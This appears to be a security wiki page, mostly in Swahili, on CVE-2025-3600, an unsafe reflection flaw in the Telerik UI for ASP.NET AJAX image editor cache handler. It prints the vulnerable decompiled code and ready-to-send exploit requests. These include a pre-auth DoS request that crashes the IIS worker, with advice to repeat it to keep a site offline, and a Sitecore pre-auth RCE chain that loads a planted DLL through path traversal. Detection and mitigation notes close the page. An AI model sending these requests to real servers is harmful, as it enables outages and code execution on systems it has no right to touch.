Telerik UI for ASP.NET AJAX – Reflection isiyo salama kupitia WebResource.axd (type=iec)

Reading time: 8 minutes

Pre‑auth constructor execution katika Telerik UI for ASP.NET AJAX Image Editor cache handler inaruhusu universal DoS na, katika programu nyingi, pre‑auth RCE kupitia gadgets maalum kwa lengo (CVE-2025-3600).

TL;DR

• Affected component/route: Telerik.Web.UI.WebResource.axd with query type=iec (Image Editor cache handler). Inaonyesha pre‑auth katika bidhaa nyingi.
• Primitive: Mshambuliaji anadhibiti jina la type (prtype). The handler inalitatua kwa Type.GetType() na inalia Activator.CreateInstance() kabla ya kuthibitisha interface type-safety. Constructor yoyote ya .NET ya umma bila parameter itaendeshwa.
• Impact:
  • DoS ya pre‑auth kwa kiwango cha ulimwengu kwa kutumia gadget ya .NET framework (PowerShell WSMan finalizer).
  • Mara nyingi hubadilika kuwa pre‑auth RCE katika deployments halisi kwa kutumia gadgets maalum za programu, hasa AppDomain.AssemblyResolve handlers zisizo salama.
• Fix: Sasisha kuwa Telerik UI for ASP.NET AJAX 2025.1.416+ au ondoa/funga handler.

Matoleo yaliyoathirika

• Telerik UI for ASP.NET AJAX versions 2011.2.712 through 2025.1.218 (inclusive) ni hatarini.
• Fixed in 2025.1.416 (released 2025-04-30). Sahihisha mara moja au ondoa/funga handler.

Eneo lililoathiriwa na ugunduzi wa haraka

• Kagua ufichaji:
  • GET /Telerik.Web.UI.WebResource.axd inapaswa kurudisha kitu tofauti na 404/403 ikiwa handler imesanidiwa.
  • Angalia web.config kwa handlers zinazofanya mapping kwenda Telerik.Web.UI.WebResource.axd.
  • Njia ya kusababisha code inayovuja inahitaji: type=iec, dkey=1, na prtype=.

Example probe and generic trigger:

GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=Namespace.Type, Assembly

Vidokezo

• Baadhi ya PoCs hutumia dtype; utekelezaji unakagua dkey=="1" kwa mtiririko wa kupakua.
• prtype inapaswa kuwa assembly-qualified au iweze kutatuliwa katika AppDomain ya sasa.

Sababu kuu – unsafe reflection in ImageEditorCacheHandler

Mtiririko wa kupakua cache wa Image Editor huunda mfano wa aina iliyopeanwa katika prtype na baadaye tu huibadilisha kuwa ICacheImageProvider na kuthibitisha ufunguo wa kupakua. Constructor tayari imekwisha endeshwa wakati uthibitisho unapoanguka.

// entrypoint
public void ProcessRequest(HttpContext context)
{
string text = context.Request["dkey"];           // dkey
string text2 = context.Request.Form["encryptedDownloadKey"]; // download key
...
if (this.IsDownloadedFromImageProvider(text)) // effectively dkey == "1"
{
ICacheImageProvider imageProvider = this.GetImageProvider(context); // instantiation happens here
string key = context.Request["key"];
if (text == "1" && !this.IsValidDownloadKey(text2))
{
this.CompleteAsBadRequest(context.ApplicationInstance);
return; // cast/check happens after ctor has already run
}
using (EditableImage editableImage = imageProvider.Retrieve(key))
{
this.SendImage(editableImage, context, text, fileName);
}
}
}

private ICacheImageProvider GetImageProvider(HttpContext context)
{
if (!string.IsNullOrEmpty(context.Request["prtype"]))
{
return RadImageEditor.InitCacheImageProvider(
RadImageEditor.GetICacheImageProviderType(context.Request["prtype"]) // [A]
);
}
...
}

public static Type GetICacheImageProviderType(string imageProviderTypeName)
{
return Type.GetType(string.IsNullOrEmpty(imageProviderTypeName) ?
typeof(CacheImageProvider).FullName : imageProviderTypeName); // [B]
}

protected internal static ICacheImageProvider InitCacheImageProvider(Type t)
{
// unsafe: construct before enforcing interface type-safety
return (ICacheImageProvider)Activator.CreateInstance(t); // [C]
}

Exploit primitive: Controlled type string → Type.GetType resolves it → Activator.CreateInstance runs its public parameterless constructor. Hata kama ombi litatupiliwa baadaye, athari za gadget tayari zimetokea.

Universal DoS gadget (no app-specific gadgets required)

Darasa: System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper katika System.Management.Automation (PowerShell) ina finalizer ambayo hu-dispose handle isiyowekwa (uninitialized), ikisababisha unhandled exception wakati GC inalimaliza. Hii kwa uhakika ina-crash IIS worker process muda mfupi baada ya kuundwa.

One‑shot DoS request:

GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35

Vidokezo

• Endelea kutuma kwa vipindi ili kuifanya site isipatikane. Unaweza kuona constructor ikipigwa katika debugger; crash hutokea kwenye finalization.

From DoS to RCE – escalation patterns

Utekelezaji usio salama wa constructor hufungua gadgets na chains nyingi maalum kwa lengo. Tafuta:

1. Parameterless constructors that process attacker input

• Baadhi ya ctors (au static initializers) hufanya usomaji wa mara moja wa Request query/body/cookies/headers na (de)serialize yao.
• Mfano (Sitecore): mnyororo wa ctor unafika GetLayoutDefinition() ambayo inasoma HTTP body "layout" na ku-deserialize JSON kupitia JSON.NET.

2. Constructors that touch files

• Ctros ambazo zinapakia au ku-deserialize config/blobs kutoka disk zinaweza kulazimishwa ikiwa unaweza kuandika kwenye paths hizo (uploads/temp/data folders).

3. Constructors performing app-specific ops

• Kurudisha state, kuwasha/kuzimisha modules, au kumaliza processes.

4. Constructors/static ctors that register AppDomain event handlers

• Mengi ya apps huongeza AppDomain.CurrentDomain.AssemblyResolve handlers ambazo hujenga DLL paths kutoka args.Name bila sanitization. Ikiwa unaweza kuathiri type resolution unaweza kulazimisha arbitrary DLL loads kutoka attacker‑controlled paths.

5. Forcing AssemblyResolve via Type.GetType

• Ombi type isiyokuwepo ili kulazimisha CLR resolution na kuitisha resolvers zilizosajiliwa (zinazoweza kuwa zisizo salama). Example assembly-qualified name:

This.Class.Does.Not.Exist, watchTowr

6. Finalizers zenye athari za uharibifu

• Baadhi ya aina huondoa faili zenye njia zilizo wazi (fixed-path) katika finalizers. Ikiambatana na kufuatilia link au njia zinazoweza kutabirika, hili linaweza kuwezesha local privilege escalation katika mazingira fulani.

Mfano pre‑auth RCE chain (Sitecore XP)

• Hatua 1 – Pre‑auth: Chochea type ambayo static/instance ctor yake inasajili insecure AssemblyResolve handler (kwa mfano, Sitecore’s FolderControlSource in ControlFactory).
• Hatua 2 – Post‑auth: Pata uwezo wa kuandika katika saraka inayochunguzwa na resolver (kwa mfano, kupitia auth bypass au weak upload) na weka DLL hatarishi.
• Hatua 3 – Pre‑auth: Tumia CVE‑2025‑3600 kwa type isiyopo na jina la assembly lenye traversal ili kulazimisha resolver kupakia DLL ulioweka → utekelezaji wa code kama IIS worker.

Mifano ya trigger

# Load the insecure resolver (no auth on many setups)
GET /-/xaml/Sitecore.Shell.Xaml.WebControl

# Coerce the resolver via Telerik unsafe reflection
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=watchTowr.poc,+../../../../../../../../../watchTowr

Uhakiki, uwindaji na DFIR notes

• Uhakiki salama la maabara: anzisha DoS payload na tazama kwa ajili ya app pool recycle/unhandled exception inayohusiana na WSMan finalizer.
• Tafuta katika telemetry:
• Requests to /Telerik.Web.UI.WebResource.axd with type=iec and odd prtype values.
• Majaribio ya kupakia type yaliyoshindwa na matukio ya AppDomain.AssemblyResolve.
• Crash/recycle ghafla za w3wp.exe zikiendelea baada ya maombi hayo.

Kupunguza

• Tumia patch hadi Telerik UI for ASP.NET AJAX 2025.1.416 au baadaye.
• Ondoa au punguza ufichaji wa Telerik.Web.UI.WebResource.axd pale inapowezekana (WAF/rewrites).
• Puuza au thibitishe prtype handling upande wa server (upgrade inatumia ukaguzi sahihi kabla ya instantiation).
• Fanya ukaguzi na thibiti custom AppDomain.AssemblyResolve handlers. Epuka kujenga paths kutoka args.Name bila kusafisha; tumia strong-named loads au whitelists.
• Kuzuia maeneo ya upload/write na zuia DLL drops katika directories zinazochunguzwa.
• Angalia majaribio ya kupakia type zisizo za kuwepo ili kugundua matumizi mabaya ya resolver.

Mwongozo mfupi

• Ukaguzi wa uwepo:
• GET /Telerik.Web.UI.WebResource.axd
• Angalia handler mapping katika web.config
• Exploit skeleton:

GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=<TypeName,+Assembly,+Version=..., +PublicKeyToken=...>

• Universal DoS:

...&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35

• Mtatua wa trigger:

This.Class.Does.Not.Exist, watchTowr

Mbinu zinazohusiana

• IIS post-exploitation, .NET key extraction, na in‑memory loaders:

IIS - Internet Information Services

• ASP.NET ViewState deserialization na matumizi mabaya ya machineKey:

Exploiting __VIEWSTATE without knowing the secrets

Marejeo

• watchTowr labs – More than DoS: Progress Telerik UI for ASP.NET AJAX Unsafe Reflection (CVE-2025-3600)
• Black Hat USA 2019 – SSO Wars: The Token Menace (Mirosh & Muñoz) – DoS gadget background
• ZDI – Abusing arbitrary file deletes to escalate privilege
• watchTowr – Is “B” for Backdoor? (Sitecore chain CVE-2025-34509)